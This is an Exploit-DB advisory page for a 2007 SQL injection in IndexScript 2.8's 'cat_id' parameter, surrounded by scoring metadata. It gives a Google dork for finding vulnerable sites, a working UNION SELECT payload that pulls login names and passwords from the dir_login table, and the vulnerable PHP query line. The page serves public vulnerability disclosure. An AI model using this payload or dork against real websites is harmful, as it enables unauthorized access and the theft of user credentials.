Lucene search

K
exploitdbXssvgamerEDB-ID:4225
HistoryJul 25, 2007 - 12:00 a.m.

IndexScript 2.8 - 'cat_id' SQL Injection

2007-07-2500:00:00
xssvgamer
www.exploit-db.com
31545

AI Score

7.4

Confidence

Low

EPSS

0.009

Percentile

83.3%

Site: http://indexscript.com
Found By: xssvgamer

Google Dork: allintext: "This site is powered by IndexScript"

exploit:

http://www.example.com/show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*

Blind SQL injection in indexscript..

Vul Code:
"$sql = "select name, meta_title, meta_description, meta_keywords from dir_cat where " .
 "cat_id=" . fnpreparesql($_GET['cat_id']);"

# milw0rm.com [2007-07-25]

AI Score

7.4

Confidence

Low

EPSS

0.009

Percentile

83.3%

Related for EDB-ID:4225